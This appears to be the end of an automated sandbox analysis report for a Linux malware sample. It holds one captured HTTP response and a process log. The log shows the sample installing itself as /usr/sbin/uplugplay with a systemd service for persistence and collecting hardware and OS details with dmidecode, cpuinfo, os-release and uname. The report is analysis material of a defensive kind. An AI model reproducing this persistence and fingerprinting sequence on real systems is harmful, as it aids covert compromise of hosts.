                                                  Jul 16, 2022 21:54:27.630609035 CEST2INHTTP/1.1 200 OK
                                                  Date: Sat, 16 Jul 2022 19:54:46 GMT
                                                  Server: Apache/2.2.8 (Win32) mod_ssl/2.2.8 OpenSSL/0.9.8g PHP/5.2.6
                                                  Content-Length: 3
                                                  Connection: close
                                                  Content-Type: text/html; charset=windows-1251
                                                  Data Raw: 6f 6b 21 0d 0a 43 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 0a 0a
                                                  Data Ascii: ok!Content-type: text/html; charset=windows-1251


                                                  System Behavior

                                                  Start time:21:54:08
                                                  Start date:16/07/2022
                                                  Path:/tmp/wCzxNCXdPh
                                                  Arguments:/tmp/wCzxNCXdPh
                                                  File size:428366 bytes
                                                  MD5 hash:e086414fe570bbb051fdd26d4e9b77c6

                                                  Start time:21:54:08
                                                  Start date:16/07/2022
                                                  Path:/tmp/wCzxNCXdPh
                                                  Arguments:n/a
                                                  File size:428366 bytes
                                                  MD5 hash:e086414fe570bbb051fdd26d4e9b77c6

                                                  Start time:21:54:08
                                                  Start date:16/07/2022
                                                  Path:/bin/sh
                                                  Arguments:sh -c "pgrep wCzxNCXdPh"
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time:21:54:08
                                                  Start date:16/07/2022
                                                  Path:/bin/sh
                                                  Arguments:n/a
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time:21:54:08
                                                  Start date:16/07/2022
                                                  Path:/usr/bin/pgrep
                                                  Arguments:pgrep wCzxNCXdPh
                                                  File size:30968 bytes
                                                  MD5 hash:fa96a75a08109d8842e4865b2907d51f

                                                  Start time:21:54:09
                                                  Start date:16/07/2022
                                                  Path:/tmp/wCzxNCXdPh
                                                  Arguments:n/a
                                                  File size:428366 bytes
                                                  MD5 hash:e086414fe570bbb051fdd26d4e9b77c6

                                                  Start time:21:54:09
                                                  Start date:16/07/2022
                                                  Path:/bin/sh
                                                  Arguments:sh -c "pidof wCzxNCXdPh"
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time:21:54:09
                                                  Start date:16/07/2022
                                                  Path:/bin/sh
                                                  Arguments:n/a
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time:21:54:09
                                                  Start date:16/07/2022
                                                  Path:/usr/bin/pidof
                                                  Arguments:pidof wCzxNCXdPh
                                                  File size:27016 bytes
                                                  MD5 hash:f58f67968fc50f1497f9ea9e9c22b6e8

                                                  Start time:21:54:10
                                                  Start date:16/07/2022
                                                  Path:/tmp/wCzxNCXdPh
                                                  Arguments:n/a
                                                  File size:428366 bytes
                                                  MD5 hash:e086414fe570bbb051fdd26d4e9b77c6

                                                  Start time:21:54:10
                                                  Start date:16/07/2022
                                                  Path:/bin/sh
                                                  Arguments:sh -c "pgrep uplugplay"
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time:21:54:10
                                                  Start date:16/07/2022
                                                  Path:/bin/sh
                                                  Arguments:n/a
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time:21:54:10
                                                  Start date:16/07/2022
                                                  Path:/usr/bin/pgrep
                                                  Arguments:pgrep uplugplay
                                                  File size:30968 bytes
                                                  MD5 hash:fa96a75a08109d8842e4865b2907d51f

                                                  Start time:21:54:11
                                                  Start date:16/07/2022
                                                  Path:/tmp/wCzxNCXdPh
                                                  Arguments:n/a
                                                  File size:428366 bytes
                                                  MD5 hash:e086414fe570bbb051fdd26d4e9b77c6

                                                  Start time:21:54:11
                                                  Start date:16/07/2022
                                                  Path:/bin/sh
                                                  Arguments:sh -c "pgrep upnpsetup"
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time:21:54:12
                                                  Start date:16/07/2022
                                                  Path:/bin/sh
                                                  Arguments:n/a
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time:21:54:12
                                                  Start date:16/07/2022
                                                  Path:/usr/bin/pgrep
                                                  Arguments:pgrep upnpsetup
                                                  File size:30968 bytes
                                                  MD5 hash:fa96a75a08109d8842e4865b2907d51f

                                                  Start time:21:54:12
                                                  Start date:16/07/2022
                                                  Path:/tmp/wCzxNCXdPh
                                                  Arguments:n/a
                                                  File size:428366 bytes
                                                  MD5 hash:e086414fe570bbb051fdd26d4e9b77c6

                                                  Start time:21:54:12
                                                  Start date:16/07/2022
                                                  Path:/bin/sh
                                                  Arguments:sh -c "pidof upnpsetup"
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time:21:54:12
                                                  Start date:16/07/2022
                                                  Path:/bin/sh
                                                  Arguments:n/a
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time:21:54:12
                                                  Start date:16/07/2022
                                                  Path:/usr/bin/pidof
                                                  Arguments:pidof upnpsetup
                                                  File size:27016 bytes
                                                  MD5 hash:f58f67968fc50f1497f9ea9e9c22b6e8

                                                  Start time:21:54:14
                                                  Start date:16/07/2022
                                                  Path:/tmp/wCzxNCXdPh
                                                  Arguments:n/a
                                                  File size:428366 bytes
                                                  MD5 hash:e086414fe570bbb051fdd26d4e9b77c6

                                                  Start time:21:54:14
                                                  Start date:16/07/2022
                                                  Path:/bin/sh
                                                  Arguments:sh -c "systemctl daemon-reload"
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time:21:54:14
                                                  Start date:16/07/2022
                                                  Path:/bin/sh
                                                  Arguments:n/a
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time:21:54:14
                                                  Start date:16/07/2022
                                                  Path:/usr/bin/systemctl
                                                  Arguments:systemctl daemon-reload
                                                  File size:996584 bytes
                                                  MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                  Start time:21:54:16
                                                  Start date:16/07/2022
                                                  Path:/tmp/wCzxNCXdPh
                                                  Arguments:n/a
                                                  File size:428366 bytes
                                                  MD5 hash:e086414fe570bbb051fdd26d4e9b77c6

                                                  Start time:21:54:16
                                                  Start date:16/07/2022
                                                  Path:/bin/sh
                                                  Arguments:sh -c "systemctl enable uplugplay.service"
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time:21:54:16
                                                  Start date:16/07/2022
                                                  Path:/bin/sh
                                                  Arguments:n/a
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time:21:54:16
                                                  Start date:16/07/2022
                                                  Path:/usr/bin/systemctl
                                                  Arguments:systemctl enable uplugplay.service
                                                  File size:996584 bytes
                                                  MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                  Start time:21:54:18
                                                  Start date:16/07/2022
                                                  Path:/tmp/wCzxNCXdPh
                                                  Arguments:n/a
                                                  File size:428366 bytes
                                                  MD5 hash:e086414fe570bbb051fdd26d4e9b77c6

                                                  Start time:21:54:18
                                                  Start date:16/07/2022
                                                  Path:/bin/sh
                                                  Arguments:sh -c "systemctl start uplugplay.service"
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time:21:54:18
                                                  Start date:16/07/2022
                                                  Path:/bin/sh
                                                  Arguments:n/a
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time:21:54:18
                                                  Start date:16/07/2022
                                                  Path:/usr/bin/systemctl
                                                  Arguments:systemctl start uplugplay.service
                                                  File size:996584 bytes
                                                  MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                  Start time:21:54:16
                                                  Start date:16/07/2022
                                                  Path:/usr/lib/systemd/systemd
                                                  Arguments:n/a
                                                  File size:1620224 bytes
                                                  MD5 hash:9b2bec7092a40488108543f9334aab75

                                                  Start time:21:54:16
                                                  Start date:16/07/2022
                                                  Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                  Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                  File size:22760 bytes
                                                  MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                                  Start time:21:54:18
                                                  Start date:16/07/2022
                                                  Path:/usr/lib/systemd/systemd
                                                  Arguments:n/a
                                                  File size:1620224 bytes
                                                  MD5 hash:9b2bec7092a40488108543f9334aab75

                                                  Start time:21:54:18
                                                  Start date:16/07/2022
                                                  Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                  Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                  File size:22760 bytes
                                                  MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                                  Start time:21:54:19
                                                  Start date:16/07/2022
                                                  Path:/usr/lib/systemd/systemd
                                                  Arguments:n/a
                                                  File size:1620224 bytes
                                                  MD5 hash:9b2bec7092a40488108543f9334aab75

                                                  Start time:21:54:19
                                                  Start date:16/07/2022
                                                  Path:/usr/sbin/uplugplay
                                                  Arguments:/usr/sbin/uplugplay
                                                  File size:428366 bytes
                                                  MD5 hash:e086414fe570bbb051fdd26d4e9b77c6

                                                  Start time:21:54:20
                                                  Start date:16/07/2022
                                                  Path:/usr/sbin/uplugplay
                                                  Arguments:n/a
                                                  File size:428366 bytes
                                                  MD5 hash:e086414fe570bbb051fdd26d4e9b77c6

                                                  Start time:21:54:20
                                                  Start date:16/07/2022
                                                  Path:/usr/sbin/uplugplay
                                                  Arguments:n/a
                                                  File size:428366 bytes
                                                  MD5 hash:e086414fe570bbb051fdd26d4e9b77c6

                                                  Start time:21:54:20
                                                  Start date:16/07/2022
                                                  Path:/bin/sh
                                                  Arguments:sh -c "/usr/sbin/uplugplay -Dcomsvc"
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time:21:54:20
                                                  Start date:16/07/2022
                                                  Path:/bin/sh
                                                  Arguments:n/a
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time:21:54:20
                                                  Start date:16/07/2022
                                                  Path:/usr/sbin/uplugplay
                                                  Arguments:/usr/sbin/uplugplay -Dcomsvc
                                                  File size:428366 bytes
                                                  MD5 hash:e086414fe570bbb051fdd26d4e9b77c6

                                                  Start time:21:54:22
                                                  Start date:16/07/2022
                                                  Path:/usr/sbin/uplugplay
                                                  Arguments:n/a
                                                  File size:428366 bytes
                                                  MD5 hash:e086414fe570bbb051fdd26d4e9b77c6

                                                  Start time:21:54:22
                                                  Start date:16/07/2022
                                                  Path:/bin/sh
                                                  Arguments:sh -c "cat /proc/cpuinfo"
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time:21:54:22
                                                  Start date:16/07/2022
                                                  Path:/bin/sh
                                                  Arguments:n/a
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time:21:54:22
                                                  Start date:16/07/2022
                                                  Path:/usr/bin/cat
                                                  Arguments:cat /proc/cpuinfo
                                                  File size:43416 bytes
                                                  MD5 hash:7e9d213e404ad3bb82e4ebb2e1f2c1b3

                                                  Start time:21:54:22
                                                  Start date:16/07/2022
                                                  Path:/usr/sbin/uplugplay
                                                  Arguments:n/a
                                                  File size:428366 bytes
                                                  MD5 hash:e086414fe570bbb051fdd26d4e9b77c6

                                                  Start time:21:54:22
                                                  Start date:16/07/2022
                                                  Path:/bin/sh
                                                  Arguments:sh -c "dmidecode --type baseboard"
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time:21:54:22
                                                  Start date:16/07/2022
                                                  Path:/bin/sh
                                                  Arguments:n/a
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time:21:54:22
                                                  Start date:16/07/2022
                                                  Path:/usr/sbin/dmidecode
                                                  Arguments:dmidecode --type baseboard
                                                  File size:121856 bytes
                                                  MD5 hash:37284ba29446fb2dadf1ce80f8139c1a

                                                  Start time:21:54:22
                                                  Start date:16/07/2022
                                                  Path:/usr/sbin/uplugplay
                                                  Arguments:n/a
                                                  File size:428366 bytes
                                                  MD5 hash:e086414fe570bbb051fdd26d4e9b77c6

                                                  Start time:21:54:22
                                                  Start date:16/07/2022
                                                  Path:/bin/sh
                                                  Arguments:sh -c "dmidecode --type baseboard"
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time:21:54:22
                                                  Start date:16/07/2022
                                                  Path:/bin/sh
                                                  Arguments:n/a
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time:21:54:22
                                                  Start date:16/07/2022
                                                  Path:/usr/sbin/dmidecode
                                                  Arguments:dmidecode --type baseboard
                                                  File size:121856 bytes
                                                  MD5 hash:37284ba29446fb2dadf1ce80f8139c1a

                                                  Start time:21:54:23
                                                  Start date:16/07/2022
                                                  Path:/usr/sbin/uplugplay
                                                  Arguments:n/a
                                                  File size:428366 bytes
                                                  MD5 hash:e086414fe570bbb051fdd26d4e9b77c6

                                                  Start time:21:54:23
                                                  Start date:16/07/2022
                                                  Path:/bin/sh
                                                  Arguments:sh -c "dmidecode --type baseboard"
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time:21:54:24
                                                  Start date:16/07/2022
                                                  Path:/bin/sh
                                                  Arguments:n/a
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time:21:54:24
                                                  Start date:16/07/2022
                                                  Path:/usr/sbin/dmidecode
                                                  Arguments:dmidecode --type baseboard
                                                  File size:121856 bytes
                                                  MD5 hash:37284ba29446fb2dadf1ce80f8139c1a

                                                  Start time:21:54:24
                                                  Start date:16/07/2022
                                                  Path:/usr/sbin/uplugplay
                                                  Arguments:n/a
                                                  File size:428366 bytes
                                                  MD5 hash:e086414fe570bbb051fdd26d4e9b77c6

                                                  Start time:21:54:24
                                                  Start date:16/07/2022
                                                  Path:/bin/sh
                                                  Arguments:sh -c "dmidecode --type baseboard"
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time:21:54:24
                                                  Start date:16/07/2022
                                                  Path:/bin/sh
                                                  Arguments:n/a
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time:21:54:24
                                                  Start date:16/07/2022
                                                  Path:/usr/sbin/dmidecode
                                                  Arguments:dmidecode --type baseboard
                                                  File size:121856 bytes
                                                  MD5 hash:37284ba29446fb2dadf1ce80f8139c1a

                                                  Start time:21:54:24
                                                  Start date:16/07/2022
                                                  Path:/usr/sbin/uplugplay
                                                  Arguments:n/a
                                                  File size:428366 bytes
                                                  MD5 hash:e086414fe570bbb051fdd26d4e9b77c6

                                                  Start time:21:54:24
                                                  Start date:16/07/2022
                                                  Path:/bin/sh
                                                  Arguments:sh -c "dmidecode --type baseboard"
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time:21:54:24
                                                  Start date:16/07/2022
                                                  Path:/bin/sh
                                                  Arguments:n/a
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time:21:54:24
                                                  Start date:16/07/2022
                                                  Path:/usr/sbin/dmidecode
                                                  Arguments:dmidecode --type baseboard
                                                  File size:121856 bytes
                                                  MD5 hash:37284ba29446fb2dadf1ce80f8139c1a

                                                  Start time:21:54:24
                                                  Start date:16/07/2022
                                                  Path:/usr/sbin/uplugplay
                                                  Arguments:n/a
                                                  File size:428366 bytes
                                                  MD5 hash:e086414fe570bbb051fdd26d4e9b77c6

                                                  Start time:21:54:24
                                                  Start date:16/07/2022
                                                  Path:/bin/sh
                                                  Arguments:sh -c "dmidecode --type baseboard"
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time:21:54:25
                                                  Start date:16/07/2022
                                                  Path:/bin/sh
                                                  Arguments:n/a
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time:21:54:25
                                                  Start date:16/07/2022
                                                  Path:/usr/sbin/dmidecode
                                                  Arguments:dmidecode --type baseboard
                                                  File size:121856 bytes
                                                  MD5 hash:37284ba29446fb2dadf1ce80f8139c1a

                                                  Start time:21:54:25
                                                  Start date:16/07/2022
                                                  Path:/usr/sbin/uplugplay
                                                  Arguments:n/a
                                                  File size:428366 bytes
                                                  MD5 hash:e086414fe570bbb051fdd26d4e9b77c6

                                                  Start time:21:54:25
                                                  Start date:16/07/2022
                                                  Path:/bin/sh
                                                  Arguments:sh -c dmidecode
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time:21:54:25
                                                  Start date:16/07/2022
                                                  Path:/bin/sh
                                                  Arguments:n/a
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time:21:54:25
                                                  Start date:16/07/2022
                                                  Path:/usr/sbin/dmidecode
                                                  Arguments:dmidecode
                                                  File size:121856 bytes
                                                  MD5 hash:37284ba29446fb2dadf1ce80f8139c1a

                                                  Start time:21:54:26
                                                  Start date:16/07/2022
                                                  Path:/usr/sbin/uplugplay
                                                  Arguments:n/a
                                                  File size:428366 bytes
                                                  MD5 hash:e086414fe570bbb051fdd26d4e9b77c6

                                                  Start time:21:54:26
                                                  Start date:16/07/2022
                                                  Path:/bin/sh
                                                  Arguments:sh -c "cat /etc/os-release"
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time:21:54:26
                                                  Start date:16/07/2022
                                                  Path:/bin/sh
                                                  Arguments:n/a
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time:21:54:26
                                                  Start date:16/07/2022
                                                  Path:/usr/bin/cat
                                                  Arguments:cat /etc/os-release
                                                  File size:43416 bytes
                                                  MD5 hash:7e9d213e404ad3bb82e4ebb2e1f2c1b3

                                                  Start time:21:54:26
                                                  Start date:16/07/2022
                                                  Path:/usr/sbin/uplugplay
                                                  Arguments:n/a
                                                  File size:428366 bytes
                                                  MD5 hash:e086414fe570bbb051fdd26d4e9b77c6

                                                  Start time:21:54:26
                                                  Start date:16/07/2022
                                                  Path:/bin/sh
                                                  Arguments:sh -c uptime
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time:21:54:26
                                                  Start date:16/07/2022
                                                  Path:/bin/sh
                                                  Arguments:n/a
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time:21:54:26
                                                  Start date:16/07/2022
                                                  Path:/usr/bin/uptime
                                                  Arguments:uptime
                                                  File size:14568 bytes
                                                  MD5 hash:3ad70d8e33316ac713bf25c2ddf2fb14

                                                  Start time:21:54:26
                                                  Start date:16/07/2022
                                                  Path:/usr/sbin/uplugplay
                                                  Arguments:n/a
                                                  File size:428366 bytes
                                                  MD5 hash:e086414fe570bbb051fdd26d4e9b77c6

                                                  Start time:21:54:26
                                                  Start date:16/07/2022
                                                  Path:/bin/sh
                                                  Arguments:sh -c "uname -a"
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time:21:54:26
                                                  Start date:16/07/2022
                                                  Path:/bin/sh
                                                  Arguments:n/a
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time:21:54:26
                                                  Start date:16/07/2022
                                                  Path:/usr/bin/uname
                                                  Arguments:uname -a
                                                  File size:39288 bytes
                                                  MD5 hash:4ac7c634c5bec95753c480e9d421dcc2